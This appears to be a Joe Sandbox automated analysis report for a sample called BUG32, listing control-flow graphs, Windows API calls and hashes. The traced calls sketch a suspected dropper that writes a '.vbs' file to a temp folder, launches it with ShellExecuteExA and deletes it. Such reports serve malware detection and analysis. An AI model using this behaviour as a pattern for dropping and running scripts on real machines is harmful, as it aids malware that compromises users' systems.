                            control_flow_graph 957 40230c-40230e 958 402313-40231e 957->958 958->958 959 402320-402391 call 404060 * 3 ShellExecuteExA 958->959 966 402395-4023b2 call 408762 GetExitCodeProcess 959->966 969 4023c2 966->969 970 4023b4-4023be 966->970 969->966 970->969 971 4023c0-4023eb call 40cf60 * 3 970->971
                            APIs
                            • ShellExecuteExA.SHELL32(?), ref: 0040238C
                            • GetExitCodeProcess.KERNEL32(?,?), ref: 004023AB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: CodeExecuteExitProcessShell
                            • String ID: open
                            • API String ID: 1016612177-2758837156
                            • Opcode ID: 8639a616f04692d0347771297d232af81e3bfb7e5e0e4949981b71da53a9477e
                            • Instruction ID: 817a58993c7fa3e9917572a13251828c410835906fd6d490a44f7636a9077fab
                            • Opcode Fuzzy Hash: 8639a616f04692d0347771297d232af81e3bfb7e5e0e4949981b71da53a9477e
                            • Instruction Fuzzy Hash: 10216D71108209EFD700EF64C981A5FBBE8EB84304F20883EF698A72D0D779D9159B56

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 980 40a8a0-40a8db call 40c325 CreateFileA 983 40a8f6-40a8fa 980->983 984 40a8dd-40a8f4 CreateFileA 980->984 985 40a949-40a94e 983->985 986 40a8fc-40a903 983->986 984->983 984->985 989 40a950-40a958 call 40c3cf 985->989 990 40a95d-40a963 985->990 987 40a905-40a917 HeapAlloc 986->987 988 40a919 986->988 991 40a91c-40a935 987->991 988->991 989->990 993 40a940-40a946 991->993 994 40a937-40a93d 991->994
                            APIs
                            • CreateFileA.KERNELBASE(0040F1F8,C0000000,00000001,00000000,00000002,00000080,00000000,00C41950,00000000,?,?,?,00000000,00401967,00000001,004102FC), ref: 0040A8D4
                            • CreateFileA.KERNELBASE(0040F1F8,40000000,00000001,00000000,00000005,00000000,00000000,?,?,?,00000000,00401967,00000001,004102FC,.vbs,0040F01E), ref: 0040A8ED
                            • HeapAlloc.KERNEL32(00C40000,00000000,00001000,?,?,?,00000000,00401967,00000001,004102FC,.vbs,0040F01E,00000000,004102C4,00000800,00000000), ref: 0040A90E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: CreateFile$AllocHeap
                            • String ID:
                            • API String ID: 2009486018-0
                            • Opcode ID: 377fb929696836388232f1c237ff2c1487108d2cad216613574013a23cdeb15e
                            • Instruction ID: e8cea0d77bc2bdadbb2b9fc11be6573bb77a3911cdb9b87cd1723c814217c381
                            • Opcode Fuzzy Hash: 377fb929696836388232f1c237ff2c1487108d2cad216613574013a23cdeb15e
                            • Instruction Fuzzy Hash: 0521F6B2340311ABD2309F69AC84F57B398E784730F10873AF660A72D0C675AC548769

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 995 40a5c4-40a5d1 996 40a5d3-40a601 strncpy strlen 995->996 997 40a634 995->997 998 40a616-40a61e 996->998 999 40a636-40a637 997->999 1000 40a620-40a632 CreateDirectoryA 998->1000 1001 40a603-40a609 998->1001 1000->999 1002 40a615 1001->1002 1003 40a60b-40a60e 1001->1003 1002->998 1003->1002 1004 40a610-40a613 1003->1004 1004->1000 1004->1002
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: CreateDirectorystrlenstrncpy
                            • String ID:
                            • API String ID: 2535372781-0
                            • Opcode ID: 8d2a5cc74f10a60c83dd2d8d95c1f053436a8c6d9b1ba28470bd6e37ebc88546
                            • Instruction ID: 3638c331ca430f309c90d03a0f45a7b214727569a4a90e35d4341543688e6d2a
                            • Opcode Fuzzy Hash: 8d2a5cc74f10a60c83dd2d8d95c1f053436a8c6d9b1ba28470bd6e37ebc88546
                            • Instruction Fuzzy Hash: AC01F9714083089DDB209A54C84DBDAB7795710304F4808B2D0C5F21C1DBBE89D8CB5B

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1005 406f79-406faf memset InitCommonControlsEx CoInitialize
                            APIs
                            • memset.MSVCRT ref: 00406F86
                            • InitCommonControlsEx.COMCTL32(00000000,00001000), ref: 00406FA0
                            • CoInitialize.OLE32(00000000), ref: 00406FA8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: CommonControlsInitInitializememset
                            • String ID:
                            • API String ID: 2179856907-0
                            • Opcode ID: 5b40f699901a0970416d91448b705ea41c3155aeba36c19ec272011a5a1b4523
                            • Instruction ID: 82f016c93d16dbb58e9f781f6d69cd9d07a778dfdc91a6d5d75576edb25b5773
                            • Opcode Fuzzy Hash: 5b40f699901a0970416d91448b705ea41c3155aeba36c19ec272011a5a1b4523
                            • Instruction Fuzzy Hash: 16E0ECB5900208BBEB80EBD0EC0AF8D7BACAB04708F404078A604F61C1EBB466488765
                            APIs
                              • Part of subcall function 0040CBE5: HeapFree.KERNEL32(00000000,-00000018,?,0040CACD,0040F1F8,?,?,?,?,004010D3,00000008,00000401,00000007,0040F208,00410350,00000008), ref: 0040CC26
                            • RtlAllocateHeap.NTDLL(00000000,00000FE8,0040F1F8,?,?,?,?,004010D3,00000008,00000401,00000007,0040F208,00410350,00000008,00000000,0040F1F8), ref: 0040CAE0
                            • memset.MSVCRT ref: 0040CB17
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Heap$AllocateFreememset
                            • String ID:
                            • API String ID: 2774703448-0
                            • Opcode ID: 962939bbc1c129536b81e345cb94afb2115f25e56fc71ff2cb34abfb5d6bf031
                            • Instruction ID: 3de1c109d0803dec6b1da7b0724916fd18357b27eca840a503e4f2ccd030e352
                            • Opcode Fuzzy Hash: 962939bbc1c129536b81e345cb94afb2115f25e56fc71ff2cb34abfb5d6bf031
                            • Instruction Fuzzy Hash: B3115172501615ABCB209F19EC81E4BBBF4EF55750F04822AFD08AB391D774E8148BA9
                            APIs
                            • RtlAllocateHeap.NTDLL(026C0000,00000000,-00000005,?,?,0040241C,00000000,00000400,00000000,00000000,00000000,00000000,0040130D,OPS,00000000,00000000), ref: 0040CE76
                            • HeapReAlloc.KERNEL32(026C0000,00000000,00000000,-00000005,?,?,0040241C,00000000,00000400,00000000,00000000,00000000,00000000,0040130D,OPS,00000000), ref: 0040CE99
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Heap$AllocAllocate
                            • String ID:
                            • API String ID: 2177240990-0
                            • Opcode ID: eb6b9da25561b8ec15e019ac98adf15a9258364a441095239908f76f396da3d0
                            • Instruction ID: ec9ae3c0d581d7d1ce73b33546437bf674e21835adf17632ce16ef93fa1d10cf
                            • Opcode Fuzzy Hash: eb6b9da25561b8ec15e019ac98adf15a9258364a441095239908f76f396da3d0
                            • Instruction Fuzzy Hash: 8D11EDB4601208EFC700CF68D984E9A77B5FB8C750F10C169F8199B360D775AD41CB94
                            APIs
                            • HeapFree.KERNEL32(00C40000,00000000,?,00000000,00C41950,00000000,?,?,0040198B,00000001,00000001,00000001,004102FC,.vbs,0040F01E,00000000), ref: 0040A6C5
                            • FindCloseChangeNotification.KERNELBASE(?,00C41950,00000000,?,?,0040198B,00000001,00000001,00000001,004102FC,.vbs,0040F01E,00000000,004102C4,00000800,00000000), ref: 0040A6CE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: ChangeCloseFindFreeHeapNotification
                            • String ID:
                            • API String ID: 1642550653-0
                            • Opcode ID: df16badc9a5d70d6f676ea4de639d56efebbaae4871264e66d3857c260ac84e3
                            • Instruction ID: 83f1b9855213f15fd96f4a5940bde5fe361ab05def3f5cde5cbabc56bb9830d0
                            • Opcode Fuzzy Hash: df16badc9a5d70d6f676ea4de639d56efebbaae4871264e66d3857c260ac84e3
                            • Instruction Fuzzy Hash: 4FF04F72610210EBC220AB65E944EABB7B9DBC4714B04CA3EF551632E0C679E851CB59
                            APIs
                              • Part of subcall function 0040C40A: HeapAlloc.KERNEL32(00000008,00000020,?,?,0040A70E,00000018,00000010,0040A680,0040105D,00000000,00001000,00000000,00000000), ref: 0040C41C
                              • Part of subcall function 0040C40A: HeapAlloc.KERNEL32(00000008,00000000,?,?,0040A70E,00000018,00000010,0040A680,0040105D,00000000,00001000,00000000), ref: 0040C447
                              • Part of subcall function 0040C45A: HeapAlloc.KERNEL32(00000008,0040ABCA,00000000,0040AC87,00000028,0040ABCA,0040ABE7), ref: 0040C467
                            • LoadIconA.USER32(00000001,0000005C), ref: 004088EA
                            • LoadCursorA.USER32(00000000,00007F00), ref: 004088FB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: AllocHeap$Load$CursorIcon
                            • String ID:
                            • API String ID: 3203760603-0
                            • Opcode ID: 6e275fb673dd107d89dcd6a0236e68b79caf7f2e23c1f8ee572bbbba7f9966fa
                            • Instruction ID: 05534e529b1ff3139ce1c0a27c26e63c3cfd4adf0fc037eb29fc17464ef31cd7
                            • Opcode Fuzzy Hash: 6e275fb673dd107d89dcd6a0236e68b79caf7f2e23c1f8ee572bbbba7f9966fa
                            • Instruction Fuzzy Hash: DBF03070A46320AAE7206B726D4EFD23E54FB41B50F10813AB605672E1C6F41090DA9C
                            APIs
                            • DefWindowProcA.USER32(?,?,?,?), ref: 0040ABBF
                              • Part of subcall function 0040AD25: EnterCriticalSection.KERNEL32(00410764), ref: 0040AD47
                            • HeapFree.KERNEL32(00000000,?), ref: 0040ABAF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: CriticalEnterFreeHeapProcSectionWindow
                            • String ID:
                            • API String ID: 2265546575-0
                            • Opcode ID: 2613acef71a6fd427e601b07e4742fe64e08c5ff09212d8fcab8abe0fbc62348
                            • Instruction ID: b795a449dd31f2b422f6a56f10024b6187c69b581a7dea6590ab3ecb4e78ea9f
                            • Opcode Fuzzy Hash: 2613acef71a6fd427e601b07e4742fe64e08c5ff09212d8fcab8abe0fbc62348
                            • Instruction Fuzzy Hash: 37F0FE32100210BBCA325F45EC05F8BBFB6EF94710F044829F245214B1C3B2A8A9DBA6
                            APIs
                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401049,00000000,00001000,00000000,00000000), ref: 0040CDDC
                            • HeapAlloc.KERNEL32(026C0000,00000000,00004104,?,00401049,00000000,00001000,00000000,00000000), ref: 0040CE0A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Heap$AllocCreate
                            • String ID:
                            • API String ID: 2618940340-0
                            • Opcode ID: 43e939275454f9fdb22967df9ca6014a22e2cd22318e51f60180cce99ac84671
                            • Instruction ID: 7e5ece01f42ae27d3d5d9d917495a599c4061fd30360fe5ff348e9a4e88c35b4
                            • Opcode Fuzzy Hash: 43e939275454f9fdb22967df9ca6014a22e2cd22318e51f60180cce99ac84671
                            • Instruction Fuzzy Hash: 8AE0B6B0180304AFE360CFA0ED59B923BA8F348751F108539F6249A6E0C7F264858F9C
                            APIs
                            • HeapFree.KERNEL32(026C0000,00000000,026C0780,?,00401D3C,00000001,00000010,OPS,00000000,00000000,00000008,00000000,0040F200,00000007,00000004,00000015), ref: 0040CE32
                            • HeapDestroy.KERNELBASE(026C0000,?,00401D3C,00000001,00000010,OPS,00000000,00000000,00000008,00000000,0040F200,00000007,00000004,00000015,00000000,00000200), ref: 0040CE3F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Heap$DestroyFree
                            • String ID:
                            • API String ID: 2061148462-0
                            • Opcode ID: a9c269490df3ad8bac5f7d24b9ba39f9d0d221cc208c5acca61f49ad6e342a5d
                            • Instruction ID: 66a7db21c660a8402f7794e49bfb716873ca712855bcdedd7767004fbaa36fad
                            • Opcode Fuzzy Hash: a9c269490df3ad8bac5f7d24b9ba39f9d0d221cc208c5acca61f49ad6e342a5d
                            • Instruction Fuzzy Hash: 28D0C975140708ABD210DBA4FD48E62336CF38C600F008838F625526A0C673B8458B58
                            APIs
                            • SetFileAttributesA.KERNEL32(00000002,00000080,0040A496,00000000,00000000,00402466,?,00000000,00000000,00000000,0040F01E,00000000,?,00000000,00000400,00000000), ref: 0040A474
                            • DeleteFileA.KERNELBASE(00000000,0040A496,00000000,00000000,00402466,?,00000000,00000000,00000000,0040F01E,00000000,?,00000000,00000400,00000000,00000000), ref: 0040A47E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: File$AttributesDelete
                            • String ID:
                            • API String ID: 2910425767-0
                            • Opcode ID: ccde4d72fbaf270df7111957817903e72e3796a0b77064ac10f4b0c3725e6d59
                            • Instruction ID: 7e3b973ce1a3a1f61267cb64a813993f7de2b367b5b3d0b3715f4945402ef06f
                            • Opcode Fuzzy Hash: ccde4d72fbaf270df7111957817903e72e3796a0b77064ac10f4b0c3725e6d59
                            • Instruction Fuzzy Hash: 83D09E34008340AAD7655B20DE0D71EBAA17F90746F54C839B8C5600F0C7B94869EB0B
                            APIs
                              • Part of subcall function 0040A290: HeapAlloc.KERNEL32(00BE0000,00000008,00000000,00402CDB,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004012F4,OPS,00000000,00000000,00000008), ref: 0040A2A1
                              • Part of subcall function 0040A563: GetTempPathA.KERNEL32(00000104,00000000,00000104,00000007,?,?,?,00000000,00402412,00000400,00000000,00000000,00000000,00000000,0040130D,OPS), ref: 0040A57A
                              • Part of subcall function 0040A563: LoadLibraryA.KERNEL32(Kernel32.DLL,?,?,?,00000000,00402412,00000400,00000000,00000000,00000000,00000000,0040130D,OPS,00000000,00000000,00000008), ref: 0040A587
                              • Part of subcall function 0040A563: GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 0040A599
                              • Part of subcall function 0040A563: GetLongPathNameA.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00402412,00000400,00000000,00000000,00000000,00000000,0040130D,OPS,00000000), ref: 0040A5A6
                              • Part of subcall function 0040A563: FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00402412,00000400,00000000,00000000,00000000,00000000,0040130D,OPS,00000000,00000000,00000008), ref: 0040A5AB
                              • Part of subcall function 0040CE50: RtlAllocateHeap.NTDLL(026C0000,00000000,-00000005,?,?,0040241C,00000000,00000400,00000000,00000000,00000000,00000000,0040130D,OPS,00000000,00000000), ref: 0040CE76
                            • GetTempFileNameA.KERNEL32(00000000,0040F01E,00000000,?,00000000,00000400,00000000,00000000,00000000,00000000,0040130D,OPS,00000000,00000000,00000008,00000000), ref: 0040242D
                              • Part of subcall function 0040A2B0: memcpy.MSVCRT ref: 0040A2E1
                              • Part of subcall function 0040CE50: HeapReAlloc.KERNEL32(026C0000,00000000,00000000,-00000005,?,?,0040241C,00000000,00000400,00000000,00000000,00000000,00000000,0040130D,OPS,00000000), ref: 0040CE99
                              • Part of subcall function 0040A300: HeapFree.KERNEL32(00BE0000,00000000,00000000,0040245B,?,00000000,00000000,00000000,0040F01E,00000000,?,00000000,00000400,00000000,00000000,00000000), ref: 0040A30E
                              • Part of subcall function 0040A5C4: strncpy.MSVCRT ref: 0040A5E2
                              • Part of subcall function 0040A5C4: strlen.MSVCRT ref: 0040A5F2
                              • Part of subcall function 0040A5C4: CreateDirectoryA.KERNELBASE(?,00000000), ref: 0040A62C
                              • Part of subcall function 0040A395: GetCurrentDirectoryA.KERNEL32(00000104,00000000,00000104,00000000,?,?,00000000,00402482,?,00000000,00000000,00000000,0040F01E,00000000,?,00000000), ref: 0040A3AB
                              • Part of subcall function 0040CF00: strlen.MSVCRT ref: 0040CF13
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Heap$AllocDirectoryFreeLibraryNamePathTempstrlen$AddressAllocateCreateCurrentFileLoadLongProcmemcpystrncpy
                            • String ID:
                            • API String ID: 1720924072-0
                            • Opcode ID: 1cfd8a768aebba1f0c516be70b1bad87327bc7d6eb80a8640a4afe77b973e119
                            • Instruction ID: 0f97f518720f849806c6de168ed6763b3a102d628ba9393265c63b6a8e3c4661
                            • Opcode Fuzzy Hash: 1cfd8a768aebba1f0c516be70b1bad87327bc7d6eb80a8640a4afe77b973e119
                            • Instruction Fuzzy Hash: 99214F71004304EFC701FFA1ED85A9AB7A9EB44308F10893AF544A61B1C7B958A5DB5E
                            APIs
